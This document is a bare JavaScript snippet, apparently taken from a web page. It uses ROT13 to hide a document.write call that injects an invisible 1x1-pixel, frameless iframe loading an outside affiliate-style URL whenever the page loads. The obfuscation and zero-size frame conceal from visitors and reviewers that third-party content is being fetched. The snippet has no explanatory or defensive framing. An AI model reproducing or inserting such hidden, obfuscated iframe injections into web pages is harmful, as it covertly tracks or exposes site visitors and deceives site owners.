
function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26)})}document.write(rot13("<vsenzr fep=\"uggc://nyg.pbz/tb/t1069824-cpg.fho_whtraqfpuhgm\" jvqgu=\"1\" urvtug=\"1\" fpebyyvat=\"ab\" znetvaurvtug=\"0\" znetvajvqgu=\"0\" senzrobeqre=\"0\"> </vsenzr>"));



